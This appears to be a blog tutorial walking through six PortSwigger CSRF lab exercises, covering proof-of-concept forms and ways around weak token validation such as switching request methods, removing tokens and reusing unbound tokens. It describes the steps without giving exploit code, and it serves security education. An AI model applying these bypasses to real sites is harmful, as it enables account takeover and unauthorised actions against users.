cross site request forgery

Mastering CSRF: Uncover and Exploit Hidden Web Vulnerabilities

What is Cross-Site Request Forgery (CSRF)?

Cross-Site Request Forgery (CSRF) is a sneaky web vulnerability that tricks users into performing unintended actions on a web application where they’re already logged in. This can result in unauthorized changes or transactions, posing serious security threats.

The Impact of CSRF Vulnerabilities

When CSRF attacks hit, the consequences can be severe, including:

  • Altering user passwords
  • Transferring funds from accounts
  • Changing email addresses linked to accounts
  • Hijacking user accounts
  • Gaining full control of an application if the user has high privileges

Exploiting CSRF Vulnerabilities: Hands-On Examples

Let’s explore practical examples of CSRF exploitation using PortSwigger labs.

Lab 1: CSRF with No Defenses

In this lab, we start by logging in with the given credentials. We then navigate to the email change function and update the email address. By inspecting the request, we generate a CSRF Proof of Concept (PoC) HTML script using the “Generate CSRF PoC” option in the engagement tools.

The generated HTML script contains a form that submits a POST request to change the email address. Key parts of the script include:

  • The “action” attribute, which specifies the URL for the request
  • The “method” attribute, set to “POST” since we’re updating information
  • The “input type” set to “hidden” to conceal the new email value from the user
  • The “submit” button, which sends the request

After storing and delivering the exploit to the victim, the lab is successfully completed.

Lab 2: CSRF with Token Validation Depending on Request Method

Here, the server includes a CSRF token in the request. We generate a similar HTML script, but the initial POST request fails. By switching the request method to GET, we bypass the token validation and successfully exploit the vulnerability.

Lab 3: CSRF with Token Validation Depending on Token Presence

In this scenario, the server checks for the presence of a CSRF token but doesn’t validate its correctness. By removing the token from our request, we exploit the vulnerability and complete the lab.

Lab 4: CSRF with Token Not Tied to User Session

In this lab, the CSRF token isn’t tied to the user session. We log in as one user, copy the CSRF token, and use it to exploit another user’s session. This shows how tokens not tied to sessions can be misused.

Lab 5: CSRF with Token Tied to Non-Session Cookie

This scenario involves a CSRF token tied to a non-session cookie. We need to include both the token and the cookie in our request. By crafting a script that includes both, we successfully exploit the vulnerability.

Lab 6: CSRF with Token Duplicated in Cookie

In this final lab, the CSRF token is duplicated in a cookie. We craft a request that includes the token in both the request parameters and the cookie, successfully exploiting the vulnerability.

Conclusion

Understanding and exploiting CSRF vulnerabilities is vital for both offensive and defensive security strategies. By following these practical examples, security professionals can better identify and mitigate these vulnerabilities.

For further reading, check out the PortSwigger CSRF documentation.

Similar Posts